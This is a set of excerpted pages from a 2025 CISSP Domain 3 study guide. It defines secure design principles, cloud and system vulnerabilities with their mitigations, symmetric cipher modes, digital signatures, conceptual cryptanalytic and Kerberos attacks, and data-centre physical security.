Zachman: Enterprise Security Architecture based on 2-d table of what, how, when who, where, why; and
identification, definition, representation, specification, configuration, and installation
Zero-knowledge proof: one person demonstrates to another that they can achieve a result that requires
sensitive info without actually disclosing the sensitive info
3.1 Research, implement, and manage engineering processes using secure design
principles (OSG-10 Chpts 1,8,9,16)
Standard secure design principles are:
Least privilege
Secure defaults
Fail securely
Threat modeling
Keep it simple
Separation of duties
Zero trust
Privacy by design
3.1.1 Threat Modeling
Threat modeling: (see Domain 1), a security process where potential threats are identified, categorized,
and analyzed; it can be performed as a proactive measure during design and development or as an
reactive measure once a product has been deployed
39 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Threat modeling identifies the potential harm, the probability of occurrence, the priority of concern,
and the means to eradicate or reduce the threat
Threat modeling commonly involves decomposing the app to understand it and how it interacts
with other components or users; identifying and ranking threats allows potential threats to be
prioritized; identifying how to mitigate those threats finishes the process
3.1.2 Least Privilege
As noted in Domain 2, Least privilege states that subjects are granted only the privileges necessary to
perform assigned work tasks and no more; this concept extends to data and systems
Limiting and controlling privileges based on this concept protects confidentiality and data integrity
3.1.3 Defense in Depth
Defense in Depth: AKA layering, is the use of multiple controls in a series, where a single failed control
should not result in exposure of systems or data; layers should be used in a series (one after the other),
NOT in parallel
When you see the terms like levels, multilevel, layers, classifications, zones, realms, compartments,
protection rings etc think about Defense in Depth
3.1.4 Secure defaults
Secure defaults: when you think about defaults, consider how something operates brand new, just
turned over to you by the vendor
e.g. wireless router default admin password, or firewall configuration requiring changes to meet an
organization's needs
3.1.5 Fail securely
Fail securely: if a system, asset, or process fails, it shouldn't reveal sensitive information, or be less
secure than during normal operation; failing securely could involve reverting to defaults
Physical vs digital failure table
State Digital Physical
Fail-Open maintain system availability protect people
Fail-Safe maintain confidentiality/integrity protect people
Fail-Closed maintain c/i protect asset
Fail-Secure maintain c/i protect asset
3.1.6 Separation of duties (SoD)
Separation of duties (SoD): separation of duties (SoD) and responsibilities ensures that no single person
has total control over a critical function or system; SoD is a process to minimize opportunities for misuse
of data or environment damage; separation of duties helps prevent fraud
e.g. one person sells tickets, another collects tickets and restricts access to ticket holders in a
movie theater
3.1.7 Keep it simple and small
Keep it simple: AKA keep it simple, stupid (KISS), this concept is the encouragement to avoid over-
complicating the environment, organization, or product design
3.1.8 Zero Trust or trust but verify
40 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Zero Trust: "assume breach"; a security concept and alternative of the traditional (castle/moat) approach
where nothing is automatically trusted; instead each request for activity or access is assumed to be from
an unknown and untrusted location until otherwise verified
Trust but verify: based on a Russian proverb, and no longer sufficient; it's the traditional approach of
trusting subjects and devices within a company's security perimeter automatically, leaving an org
vulnerable to insider attacks and providing intruders the ability to easily perform lateral movement
"Never trust, always verify" replaces "trust but verify" as a security design principle by asserting that all
activities by all users/entities must be subject to control, authentication, authorization, and management
at the most granular level possible
Goal is to have every access request authenticated, authorized, and encrypted prior to access being
granted to an asset or resource
See my article on an Overview of Zero Trust Basics
3.1.9 Privacy by design
Privacy by design (PbD): a guideline to integrate privacy protections into products during the earliest
design phase rather than tacking it on at the end of development
Same overall concept as "security by design" or "integrated security" where security is an element
of design and architecture of a product starting at initiation and continuing through the software
development lifecycle (SDLC)
There are 7 recognized principles to achieve privacy by design:
Proactive, preventative: think ahead and design for things that you anticipate might happen
Default setting: make private by default, e.g. social media app shouldn't share user data with
everybody by default
Embedded: build privacy in; donʼt add it later
Full functionality, positive-sum: achieve both security and privacy, not just one or the other
Full lifecycle protection: privacy should be achieved before, during and after a transaction;
part of this is securely disposing of data when it is no longer needed
Visibility, transparency, open: publish the requirements and goals; audit them and publish the
findings
Respect, user-centric: involve end users, providing the right amount of information for them
to make informed decisions about their data
3.1.10 Shared responsibility
Shared responsibility: the security design principle that organizations do not operate in isolation
Everyone in an organization has some level of security responsibility
The job of the CISO and security team is to establish & maintain security
The job of regular employees to perform their tasks within the confines of security
The job of the auditor is to monitor the environment for violations
Because we participate in shared responsibility we must research, implement, and manage
engineering processes using secure design principles
When working with third parties, especially with cloud providers, each entity needs to understand
their portion of the shared responsibility of performing work operations and maintaining security;
this is often referenced as the cloud shared responsibility model
3.1.11 Secure access service edge
Secure Access Service Edge (SASE): a cloud-delivered framework that brings together networking and
security functions into a unified platform, integrating capabilities like Software-Defined Wide Area
Networking (SD-WAN), Secure Web Gateway (SWG), Access Security Broker (CASB), Firewall-as-a-
Service (FWaaS), and Zero Trust Network Access (ZTNA); SASE aims to:
41 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Address traditional or legacy security mode and architecture limitations by eliminating blind spots
and maintaining enterprise-wide protection via continuous monitoring of user behavior and network
conditions
Securing remote access associated with remote and hybrid work models by providing granular
access controls and identity-based authentication, where every user and device must be
authenticated and authorized for resources access
Enhancing cloud adoption by integrating on-premise and cloud and providing control visibility via
cloud
Brings security and networking closer to user/devices by leveraging edge computing which
improves performance/reduces latency, and ensures consistent security treatment no matter where
users are geographically
Table comparing SASE to traditional perimeter model:
Aspect Traditional Perimeter-Based Model Secure Access Service Edge (SASE)
Security "Castle-and-moat" — strong Zero Trust — never trust, always
Philosophy perimeter, trusted internal network verify; identity-based security
Network Centralized; everything routes through Distributed; cloud-native and edge-
Architecture data center or HQ perimeter delivered services
Access Assumes users and resources are Assumes users, devices, and data are
Location inside the network perimeter everywhere (remote, cloud)
Assumption
Traffic Routing Backhauls remote traffic to a central
location for inspection
Connects users directly to services via
nearest cloud edge
Key Firewalls, VPNs, IDS/IPS, on-prem SD-WAN, ZTNA, CASB, SWG, FWaaS
Technologies proxies integrated into a cloud solution
Scalability Difficult to scale; hardware-dependent Easily scalable, cloud-delivered model
Visibility & Limited to on-premises infrastructure Centralized visibility across users,
Control apps, and devices globally
Latency & Higher latency (especially for Lower latency, local breakout to
Performance remote/cloud access) nearest edge node
Cloud & SaaS Not designed for cloud-native Built for cloud and SaaS access and
Integration environments protection
User & Device Implicit trust inside network Continuous verification based on
Trust Model identity, device posture, etc.
3.2 Understand the fundamental concepts of security models (e.g. Biba, Star Model,
Bell-LaPadula) (OSG-10 Chpt 8)
Security models:
Intended to provide an explicit set of rules that a computer can follow to implement the fundamental
security concepts, processes, and procedures of a security policy
Provide a way for a designer to map abstract statements into a security policy prescribing the algorithms
and data structures necessary to build hardware and software
Enable people to access only the data classified for their clearance level
State machine model: ensures that all instances of subjects accessing objects are secure
Information flow model: designed to prevent unauthorized, insecure, or restricted information flow; the
Information Flow model is an extension of the state machine concept and serves as the basis of design for both
42 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
3.5 Assess and mitigate the vulnerabilities of security architectures, designs and
solution elements (OSG-10 Chpts 6,7,9,16,20)
This objective relates to identifying vulnerabilities and corresponding mitigating controls and solutions; the key is
understanding the types of vulnerabilities commonly present in different environments, and their mitigation options
3.5.1 Client-based systems
Client-based systems: client computers are the most attacked entry point
Compromised client computers can be used to launch other attacks
Productivity software and browsers are constant targets
Even patched client computers are at risk due to phishing and social engineering vectors
Mitigation: run a full suite of security software, including anti-virus/malware, anti-spyware, and host-
based firewall
3.5.2 Server-based systems
Data Flow Control: movement of data between processes, between devices, across a network, or over a
communications channel
Management of data flow seeks to minimize latency/delays, keep traffic confidential (i.e. using
encryption), not overload traffic (i.e. load balancer), and can be provided by network devices/applications
and services
While attackers may initially target client computers, servers are often the goal
Mitigation: regular patching, deploying hardened server OS images for builds, and use host-based
firewalls
3.5.3 Database systems
Databases often store a company's most sensitive data (e.g. proprietary, CC info, PHI, and PII)
Cardinality: refers to the number of rows in a table
Degree: refers to the number of columns in a table
Database general ACID properties (Atomicity, Consistency, Isolation and Durability):
Atomicity: transactions are all-or-nothing; a transaction must be an atomic unit of work, i.e., all of
its data modifications are performed, or none are performed
Consistency: transactions must leave the database in a consistent state
Isolation: transactions are processed independently
Durability: once a transaction is committed, it is permanently recorded
Attackers may use inference or aggregation to obtain confidential information
Aggregation attack: based on math; process where SQL provides a number of functions that combine
records from one or more tables to produce potentially useful info
Inference attack: based on human deduction; involves combining several pieces of nonsensitive info to
gain access to that which should be classified at a higher level; inference makes use of the human mindʼs
deductive capacity rather than the raw mathematical ability of database platforms
3.5.4 Cryptographic systems
Goal of a well-implemented cryptographic system is to make compromise too time-consuming and/or
expensive
Each component has vulnerabilities:
Kerckhoff's Principle (AKA Kerckhoff's assumption): a cryptographic system should be secure
even if everything about the system, except the key, is public knowledge
Software: used to encrypt/decrypt data; can be a standalone app, command-line, built into the OS
or called via API; like any software, there are likely bugs/issues, so regular patching is important
46 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Keys: dictate how encryption is applied through an algorithm; a key should remain secret, otherwise
the security of the encrypted data is at risk
key space: represents all possible permutations of a key
key space best practices:
key length is an important consideration; use as long of a key as possible (your goal is
to outpace projected increase in cryptanalytic capability during the time the data must
be kept safe); longer keys discourage brute-force attacks
a 256-bit key is typically minimum recommendation for symmetric encryption
2048-bit key typically the minimum for asymmetric
always store secret keys securely, and if you must transmit them over a network, do so
in a manner that protects them from unauthorized disclosure
select the key using an approach that has as much randomness as possible, taking
advantage of the entire key space
destroy keys securely, when no longer needed
always base key length on requirements and sensitivity of the data being handled
Algorithms: choose algorithms (or ciphers) with a large key space and a large random key value
(key value is used by an algorithm for the encryption process)
algorithms themselves are not secret; they have extensive public details about history and
how they function
3.5.5 Industrial Control Systems (ICS)
Industrial control systems (ICS): a form of computer-management device that controls industrial
processes and machines, also known as operational technology (OT); there are several forms of ICS
including distributed control systems (DCS), programmable logic controllers (PLC), and supervisory
control and data acquisition (SCADA)
recognize that DSC, PLC, and SCADA are types of ICS; and know about how to secure ICS
Supervisory control and data acquisition (SCADA): systems used to control physical devices like those
in an electrical power plant or factory; SCADA systems are well suited for distributed environments, such
as those spanning continents
some SCADA systems still rely on legacy or proprietary communications, putting them at risk,
especially as attackers gain knowledge of such systems and their vulnerabilities
SCADA risk mitigations:
isolate networks
limit access physically and logically
restrict code to only essential apps
log all activity
3.5.6 Cloud-based systems (e.g., Software as a Service (SaaS), Infrastructure as a Service (IaaS), Platform as a
Service (PaaS))
Software as a Service (SaaS): provides fully functional apps typically accessible via a web browser
Platform as a Service (PaaS): provide consumers with a computing platform, including hardware,
operating systems, and a runtime environment
Infrastructure as a Service (IaaS): provide basic computing resources like servers, storage, and
networking
note that the cloud service provider providing the least amount of maintenance and security is the
IaaS model
Cloud-based systems: on-demand access to computing resources available from almost anywhere
Cloud's primary challenge: resources are outside the orgʼs direct control, making it more difficult to
manage risk
Orgs should formally define requirements to store and process data stored in the cloud
47 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Focus your efforts on areas that you can control, such as the network entry and exit points (i.e.
firewalls and similar security solutions)
All sensitive data should be encrypted, both for network communication and data-at-rest
Use centralized identity access and management system, with multifactor authentication
Customers shouldnʼt use encryption controlled by the vendor, eliminating risks to vendor-based
insider threats, and supporting destruction using cryptographic erase
Community cloud: the cloud environment is maintained, used, and paid for as a shared benefit by
associated users or organizations; benefits might include collaboration, data exchange, and cost savings
compared to private or public clouds
Cryptographic erase: methods that permanently remove the cryptographic keys
Capture diagnostic and security data from cloud-based systems and store in your SIEM system
Ensure cloud configuration matches or exceeds your on-premise security requirements
Understand the cloud vendor's security strategy
Cloud shared responsibility by model:
Software as a Service (SaaS):
the vendor is responsible for all maintenance of the SaaS services
Platform as a Service (PaaS):
customers deploy apps that theyʼve created or acquired, manage their apps, and modify
config settings on the host
the vendor is responsible for maintenance of the host and the underlying cloud infrastructure
Infrastructure as a Service (IaaS):
IaaS models provide basic computing resources to customers
customers install OSs and apps and perform required maintenance
the vendor maintains cloud-based infra, ensuring that customers have access to leased
systems
3.5.7 Distributed systems
Distributed computing environment (DCE): a collection of individual systems that work together to
support a resource or provide a service
DCEs are designed to support communication and coordination among their members in order to achieve
a common function, goal, or operation
Most DCEs have duplicate or concurrent components, are asynchronous, and allow for fail-soft or
independent failure of components
DCE is AKA concurrent computing, parallel computing, and distributed computing
DCE solutions are implemented as client-server, three-tier, multi-tier, and peer-to-peer
Securing distributed systems:
In distributed systems, integrity is sometimes a concern because data and software are spread
across various systems, often in different locations
Client/server model network is AKA a distributed system or distributed architecture
security must be addressed everywhere instead of at a single centralized host
processing and storage that are distributed on multiple clients and servers, and all must be
secured
network links must be secured and protected
3.5.8 Internet of Things (IoT)
Internet of things (IoT): a class of smart devices that are internet-connected in order to provide
automation, remote control, or AI processing to appliances or devices
An IoT device is almost always separate/distinct hardware used on its own or in conjunction with an
existing system
IoT security concerns often relate to access and encryption
48 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
IoT is often not designed with security as a core concept, resulting in security breaches; once an
attacker has remote access to the device they may be able to pivot
Securing IoT:
deploy a distinct network for IoT equipment, kept separate and isolated (known as three
dumb routers)
keep systems patched
limit physical and logical access
monitor activity
implement firewalls and filtering
never assume IoT defaults are good enough, evaluate settings and config options, and make
changes to optimize security while supporting business functions
disable remote management and enable secure communication only (such as over HTTPS)
review IoT vendor to understand their history with reported vulnerabilities, response time to
vulnerabilities and their overall approach to security
not all IoT devices are suitable for enterprise networks
3.5.9 Microservices (e.g., application programming interface (API))
Service-oriented Architecture (SOA): constructs new apps or functions out of existing but separate
and distinct software services, and the resulting app is often new; therefore its security issues are
unknown, untested, and unprotected; a derivative of SOA is microservices
Microservices: a feature of web-based solutions and derivative of SOA, microservices app is put
together as a collection of loosely-couples small and independent services;A microservice is simply one
element, feature, capability, business logic, or function of a web app that can be called upon or used by
other web apps
Microservices are usually small and focused on a single operation, engineered with few
dependencies, and based on fast, short-term development cycles (similar to Agile)
Each microservice exposes an Application Programming Interface (API) providing communication
and interaction with other services; these APIs allow for a modular, flexible, and scalable
architecture
Securing microservices:
use HTTPS only
encrypt everything possible and use routine scanning
closely aligned with microservices is the concept of shifting left, or addressing security
earlier in the SDLC; also integrating it into the CI/CD pipeline
consider the software supplychain or dependencies of libraries used, when addressing
updates and patching
ensure APIs are secure by using appropriate authentication, authorization, and encryption for
data exchanges
if deployed via containers, ensure appropriate access control, secure images and
configurations; ensure the software is updated and patched regularly
3.5.10 Containerization
Containerization: AKA OS virtualization, is based on the concept of eliminating the duplication of OS
elements in a virtual machine; instead each app is placed into a container that includes only the actual
resources needed to support the app, and the common or shared OS elements are used from the
hypervisor
Containerization is able to provide 10 to 100 x more application density per physical server
compared to traditional virtualization
Vendors often have security benchmarks and hardening guidelines to follow to enhance container
security
49 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Securing containers:
container challenges include the lack of isolation compared to a traditional infrastructure of
physical servers and VMs
scan container images to reveal software with vulns
secure your registries: use access controls to limit who can publish images, or even access
the registry
require images to be signed
harden container deployment including the OS of the underlying host, using firewalls, and
VPC rules, and use limited access accounts
reduce the attack surface by minimizing the number of components in each container, and
update and scan them frequently
3.5.11 Serverless
Serverless architecture (AKA function as a service (FaaS)): cloud computing where code is managed
by the customer and the platform (i.e. supporting hardware and software) or servers are managed by the
CSP
Note that FaaS is a subcategory of PaaS
Applications developed on serverless architecture are similar to microservices, and each function is
created to operate independently and autonomously
A serverless model, as in other CSP models, is a shared security model,and your org and the CSP
share security responsibility
3.5.12 Embedded systems
Embedded systems: any form of computing component added to an existing mechanical or electrical
system for the purpose of providing automation, remote control, and/or monitoring; usually including a
limited set of specific functions
Embedded systems can be a security risk because they are generally static, with admins having no
way to update or address security vulns (or vendors are slow to patch)
Embedded systems focus on minimizing cost and extraneous features
Embedded systems are often in control of/associated with physical systems, and can have real-
world impact
Securing embedded systems:
embedded systems should be isolated from the internet, and from a private production
network to minimize exposure to remote exploitation, remote control, and malware
use secure boot feature and physically protecting the hardware
3.5.13 High-Performance Computing systems
High-performance computing (HPC) systems: platforms designed to perform complex
calculations/data manipulation at extremely high speeds (e.g. super computers or MPP (Massively Parallel
Processing)); often used by large orgs, universities, or gov agencies
An HPC solution is composed of three main elements:
compute resources
network capabilities
storage capacity
HPCs often implement real-time OS (RTOS)
HPC systems are often rented, leased or shared, which can limit the effectiveness of firewalls and
invalidate air gap solutions
Securing HPC systems:
deploy head nodes and route all outside traffic through them, isolating parts of a system
"fingerprint" HPC systems to understand use, and detect anomalous behavior
50 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
and key lengths selected are sufficient to preserve the integrity of the cryptosystems for as long as
necessary -- to keep secret information safe
Specify the cryptographic algorithms (such as AES, 3DES, and RSA) acceptable for use in an organization
Identify the acceptable key lengths for use with each algorithm based on the sensitivity of the info
transmitted
Enumerate the secure transaction protocols (e.g. TLS) that may be used
As computing power goes up, the strength of cryptographic algorithms goes down; keep in mind the
effective life of a certificate or cert template, and of cryptographic systems
TLS uses an ephemeral symmetric session key between server and client, exchanged using asymmetric
cryptography; note that all content is protected using symmetric cryptography
Beyond brute force, consider things like the discovery of a bug or an issue with an algorithm or system
NIST defines the following terms that are commonly used to describe algorithms and key lengths:
approved (an algorithm that is specified as a NIST or FIPS recommendation)
acceptable (algorithm + key length is safe today)
deprecated (algorithm and key length is OK to use, but brings some risk)
restricted (use of the algorithm and/or key length is deprecated and should be avoided)
legacy (the algorithm and/or key length is outdated and should be avoided when possible)
disallowed (algorithm and/or key length is no longer allowed for the indicated use)
3.6.2 Cryptographic methods (e.g., symmetric, asymmetric, elliptic curves, quantum)
Symmetric encryption: uses the same key for encryption and decryption
symmetric encryption uses a shared secret key available to all users of the cryptosystem
symmetric encryption is faster than asymmetric encryption because smaller keys can be used for
the same level of protection
downside is that users or systems must find a way to securely share the key and hope the key is
used only for the specified communication
symmetric-key encryption can use either stream ciphers or block ciphers
primarily employed to perform bulk encryption and provides only for the security service of
confidentiality
"same" is a synonym for symmetric
"different" is a synonym for asymmetric
total number of keys required to completely connect n parties using symmetric cryptography is
given by this formula:
(n(n - 1)) / 2
symmetric cryptosystems operate in several discrete modes:
Electronic Code Book (ECB) mode: the simplest and weakest of the modes; each block of
plaintext is encrypted separately, but they are encrypted in the same way
advantages: fast, blocks can be processed simultaneously
disadvantages: any plaintext duplication would produce the same ciphertext
Cipher Block Chaining (CBC) mode: a block cipher mode of operation that encrypts
plaintext by using an operation called XOR (exclusive-OR); XORing a block with the previous
ciphertext block is known as "chaining"; this means that the decryption of a block of
ciphertext depends on all the preceding ciphertext blocks; CBC uses an Initialization Vector
or IV, which is a random value or nonce shared between sender and receiver
advantages: CBC uses the previous ciphertext block to encrypt the next plaintext
block, making it harder to deconstruct; XORing process prevents identical plaintext
from producing identical ciphertext; a single bit error in a ciphertext block affects the
decryption of that block and the next, making it harder for attackers to exploit errors
disadvantages: the blocks must be processed in order, not simultaneously (so it's
slower); CBC is also vulnerable to POODLE and GOLDENDOODLE attacks
52 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Cipher Feedback (CFB) mode: streaming version of CBC; similar to CBC, it uses an IV and
the cipher from the previous block so errors can propagate; the main difference is that with
CFB, the cipher from the previous block is encrypted first, then XORed with the current block
advantages: CFB is considered to be faster than CBC even though itʼs also sequential
disadvantages: if thereʼs an error in one block, it can carry over into the next block
Output Feedback (OFB) mode: OFB turns a block cipher into a synchronous stream cipher;
based on an IV and the key, it generates keystream blocks which are then simply XORed with
the plaintext data; as with CFB, the encryption and decryption processes are identical, and
no padding is required
advantages: OFB mode doesn't need a unique nonce for each message, which can
simplify the management and generation of nonces; it's resistant to replay attacks
disadvantages: no data integrity protection, vulnerability to IV management issues,
potential for error propagation if a ciphertext block is corrupted, and lack of
parallelization capabilities due to the dependence of the keystream on previous blocks
Counter (CTR) mode: key feature is that you can parallelize encryption and decryption, and
it doesnʼt require chaining; it uses a counter function to generate a nonce value for each
blockʼs encryption; the nonce number (aka the counter) gets encrypted and then XORed with
the plaintext to generate ciphertext; the resulting ciphertext should also always be unique
advantage: CTR mode is fast, and considered to be secure
disadvantage: lacks integrity, so we need to use hashing
Galois/Counter (GCM) mode: combines counter mode (CTR) with Galois authentication; we
can not only encrypt data, but we can authenticate where the data came from (providing
both data integrity and confidentiality); includes authentication data, and uses hashing as
starting values
advantages: extremely fast, GCM is recognized by NIST and used in the IEEE 802.1AE
standard
disadvantages: most stated disadvantages seem to be around implementation
burdens
Counter with Cipher Block Chaining Message Authentication Code (CCM) mode: uses
counter mode so there is no error propagation; there is no duplication, but uses chaining, so
cannot run in parallel; MAC or message authentication code: provides authentication and
integrity
advantages: no error propagation, provides authentication and integrity
disadvantages: cannot be run in parallel
Examples of symmetric algorithms: Twofish, Serpent, AES (Rijndael), Camellia, Salsa20,
ChaCha20, Blowfish, CAST5, Kuznyechik, RC4/5/6, DES, 3DES, Skipjack, Safer, and IDEA
Asymmetric encryption: process that uses different keys for encryption and decryption, and in which the
decryption key is computationally not possible to determine given the encryption key itself
Asymmetric (AKA public key, since one key of a pair is available to anybody) algorithms provide
convenient key exchange mechanisms and are scalable to very large numbers of users (addressing
the two most significant challenges for users of symmetric cryptosystems)
Asymmetric cryptosystems avoid the challenge of sharing the same secret key between users, by
using pairs of public and private keys to allow secure communication without the overhead of
complex key distribution
Public key: one part of the matching key pair, which can be shared or published
Besides the public key, there is a private key that should remain private and protected
Private key secrecy and integrity of an asymmetric encryption process are entirely dependent upon
protecting the value of the private key
While asymmetric encryption is slower, it is best suited for sharing between two or more parties
Asymmetric encryption provides confidentiality, authentication and non-repudiation
Asymmetric key use:
53 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
m of n control: you designate a group of (n) people as recovery agents, but only need
subset (m) of them for key recovery
split custody: enables two or more people to share access to a key (e.g. for example,
two people each hold half the password to the key)
Key rotation: rotate keys (retire old keys, implement new) to reduce the risks of a
compromised key having access
Key states:
suspension: temporary hold
revocation: permanently revoked
expiration
destruction
See NIST 800-57, Part 1
3.6.5 Digital signatures and digital certificates (e.g., non-repudiation, integrity)
Digital signatures: provide proof that a message originated from a particular user of a cryptosystem, and
ensures that the message was not modified while in transit between two parties
Digital signatures rely on a combination of two major concepts — public key cryptography, and
hashing functions
Digitally signed messages assure the recipient that the message truly came from the claimed
sender, enforcing nonrepudiation
Digitally signed messages assure the recipient that the message was not altered while in transit;
protecting against both malicious modification (third party altering message meaning), and
unintentional modification (faults in the communication process)
Digital signature process does not provide confidentiality in and of itself (only ensures integrity,
authentication, and nonrepudiation)
To digitally sign a message, first use a hashing function to generate a message digest; then encrypt
the digest with your private key
To verify a digital signature, decrypt the signature with the sender's public key and compare the
message digest to the one you generate yourself: if they match, the message is authentic
FIPS 186-5 Digital Signature Standard (DSS) - specifies three techniques for the generation and
verification of digital signatures that can be used for the protection of data:
the Rivest-Shamir-Adleman Algorithm (RSA)
the Elliptic Curve Digital Signature Algorithm (ECDSA), and
the Edwards-Curve Digital Signature Algorithm (EdDSA)
NOTE: the Digital Signature Algorithm (DSA) is now to be used only for verifying existing signatures
3.7 Understand methods of cryptanalytic attacks (OSG-10 Chpts 7,14,21)
3.7.1 Brute force
Brute force: an attack that attempts every possible valid combination for a key or password
they involve using massive amounts of processing power to methodically guess the key used to
secure cryptographic communications
3.7.2 Ciphertext only
Ciphertext only: an attack where you only have the encrypted ciphertext message at your disposal (not
the plaintext)
if you have enough ciphertext samples, the idea is that you can decrypt the target ciphertext based
on the samples
frequency analysis is a technique that is helpful against simple ciphers (see below)
56 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
side-channel characteristics information are often combined together to try to break down the
cryptography
timing attack is an example
3.7.8 Fault-Injection
Fault-Injection: the attacker attempts to compromise the integrity of a cryptographic device by causing
some type of external fault
for example, using high-voltage electricity, high or low temperature, or other factors to cause a
malfunction that undermines the security of the device
3.7.9 Timing
Timing: timing attacks are an example of a side-channel attack where the attacker measures precisely
how long cryptographic operations take to complete, gaining information about the cryptographic
process that may be used to undermine its security
3.7.10 Man-in-the-middle (MITM)
Man-in-the-middle (MITM) (AKA on-path, or Adversary-in-the-middle(AitM)): in this attack a
malicious individual sits between two communicating parties and intercepts all communications (including
the setup of the cryptographic session)
attacker responds to the originator's initialization requests and sets up a secure session with the
originator
attacker then establishes a second secure session with the intended recipient using a different key
and posing as the originator
attacker can then "sit in the middle" of the communication and read all traffic as it passes between
the two parties
3.7.11 Pass the hash
Pass the hash (PtH): a technique where an attacker captures a password hash (as opposed to the
password characters) and then simply passes it through for authentication and potentially lateral access
to other networked systems
the threat actor doesnʼt need to decrypt the hash to obtain a plain text password
PtH attacks exploit the authentication protocol, as the password's hash remains static for every
session until the password is rotated
attackers commonly obtain hashes by scraping a system's active memory and other techniques
PtH attacks typically exploit NTLM vulns, but attackers also use similar attacks against other protocols,
including Kerberos
3.7.12 Kerberos exploitation
Overpass the Hash: alternative to the PtH attack, used when NTLM is disabled on the network (AKA
pass the key)
Pass the Ticket: in this attack, attackers attempt to harvest tickets held in the lsass.exe process
Silver Ticket: a silver ticket uses the captured NTLM hash of a service account to create a ticket-granting
service (TGS) ticket (the silver ticket grants the attacker all the privileges granted to the service account)
Golden Ticket: if an attacker obtains the hash of the Kerberos service account (KRBTGT), they can
create tickets at will within Active Directory (this provides so much power it is referred to as having a
golden ticket)
Kerberos Brute-Force: attackers use the Python script kerbrute.py on Linux, and Rubeus on Windows
systems; tools can guess usernames and passwords
ASREPRoast: ASREPRoast identifies users that donʼt have Kerberos preauthentication enabled
58 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
natural surveillance: any means to make criminals feel uneasy through increased
opportunities to be observed
walkways/stairways are open, open areas around entrances
areas should be well lit
natural territorial reinforcement: attempt to make the area feel like an inclusive, caring
community
Overall goal is to deter unauthorized people from gaining access to a location (or a secure portion),
prevent unauthorized personnel from hiding inside or around the location, and prevent unauthorized from
committing crime
There are several smaller activities tied to site and facility design, such as upkeep and maintenance: if
property is run down or appears to be in disrepair, it gives attackers the impression that they can act with
impunity on the property
3.9 Design site and facility security controls (OSG-10 Chpt 10)
Note that although the topics in this section cover mostly interior spaces, physical security is applicable to both
interior and exterior of a facility
3.9.1 Wiring closets/intermediate distribution frame
Wiring closets/intermediate distribution frame (IDF): A wiring closet or IDF is typically the smallest
room that holds IT
hardware
wiring closet is AKA premises wire distribution room, main distribution frame (MDF), intermediate
distribution frame (IDF), and telecommunications room, and it is referred to as an IDF in (ISC)^2
CISSP objective 3.9.1
where networking cables for the building or a floor are connected to equipment (e.g. patch panels,
switches, routers, LAN extenders etc)
usually includes telephony and network devices, alarm systems, circuit breaker panels, punch-
down blocks, WAPs, video/security
may include a small number of servers
access to the wiring closest/IDF should be restricted to authorized personnel responsible for
managing the IT hardware
use door access control (i.e. electronic badge system or electronic combination lock)
from a layout perspective, wiring closets should be accessible only in private areas of the building
interiors; people must pass through a visitor center and a controlled doorway prior to be able to
enter a wiring closet
3.9.2 Server rooms/data centers
Server rooms/data centers: server rooms, data centers, communication rooms, server vaults, and IT
closets are enclosed, restricted, and protected rooms where mission critical servers and networks are
housed
a server room is a bigger version of a wiring closet, much smaller than a data center
a server room typically houses network equipment, backup infrastructure and servers (more
archaic versions include telephony equipment)
server rooms should be designed to support optimal operation of IT infrastructure and to block
unauthorized human access or intervention
server rooms should be located at the core of the building (avoid ground floor, top floor, or in the
basement)
server rooms should have a single entrance (and an emergency exit)
server room should block unauthorized access, and entries and exits should be logged
datacenters are usually more protected than server rooms, and can include guards and mantraps
60 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Class B: liquids
Class C: electrical
Class D: metal
Class K: cooking material (oil/grease)
Four main types of suppression:
wet pipe system: (AKA closed head system): is always filled with water; water discharges
immediately when suppression is triggered
dry pipe system: contains compressed inert gas
pre-action system: a variation of the dry pipe system that uses a two-stage detection and release
mechanism
deluge system: uses larger pipes and delivers larger volume of water
Note: Most sprinkler heads feature a glass bulb filled with a glycerin-based liquid; this liquid expands
when it comes in contact with air heated to between 135 and 165 degrees; when the liquid expands, it
shatters its glass confines and the sprinkler head activates
3.9.9 Power (e.g., redundant, backup)
Consider designing power to provide for high availability
Most power systems have to be tested at regular intervals
As part of the design, mandate redundant power systems to accommodate testing, upgrades and other
maintenance
Additionally, test failover to a redundant power system and ensure it is fully functional
The International Electrical Testing Association (NETA) has developed standards around testing power
systems
Battery backup/fail-over power (including UPS/generators):
this is a system that collects power into a battery but can switch over to pulling power from the
battery when the power grid fails
generally, this type of system was implemented to supply power to an entire building rather than
just one or a few devices
3.10 Manage the information system lifecycle (OSG-10 Chpt 10)
The Information System Lifecycle: the entire lifespan of a system, from initial concept to eventual
decommission, which includes the components below. Note that this Information System lifecycle is very similar
(with the exception of integration) to the Software Development Lifecycle (SDLC):
Initiation/Requirements
Architecture & Design
Development
Testing (note verification and validation are part of testing)
Release/Deployment
Operations/Maintenance
3.10.1 Stakeholders needs and requirements
Focused on understanding stakeholder needs and expectations, this initial phase is about ensuring the
new system will meet the needs of the people that use it, and that there is a communicated and agreed
upon understanding of those requirements
3.10.2 Requirements analysis
This is a detailed analysis of the functional and nonfunctional requirements, ensuring that goals of the
system and the organization are in alignment, as well as an analysis of the requirements to understand
any associated risks
63 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
ARP: Address Resolution Protocol; used to resolve IP addresses into Media Access Control (MAC) addresses;
provides for direct communication between two devices within the same LAN segment
ARP poisoning: AKA ARP spoofing, where an attacker sends malicious ARP messages to a local network with
the goal of associating the attackerʼs MAC address with the IP address of another device (typically the default
gateway or another trusted device) in the network; once successful, the attacker can intercept, modify, or block
data intended for that IP address, facilitating attacks like man-in-the-middle (MITM), eavesdropping, or denial of
service (DoS)
APT: Advanced Persistent Threat is an agent/org that plans, organizes, and carries out highly sophisticated
attacks against a target person, org, or industry over a period of time (months or even years); usually with a
strategic goal in mind
API: Application Programming Interface; code mechanisms that provide ways for apps to share data, methods,
or functions over a network (usually implemented in XML or JavaScript Object Notation (JSON))
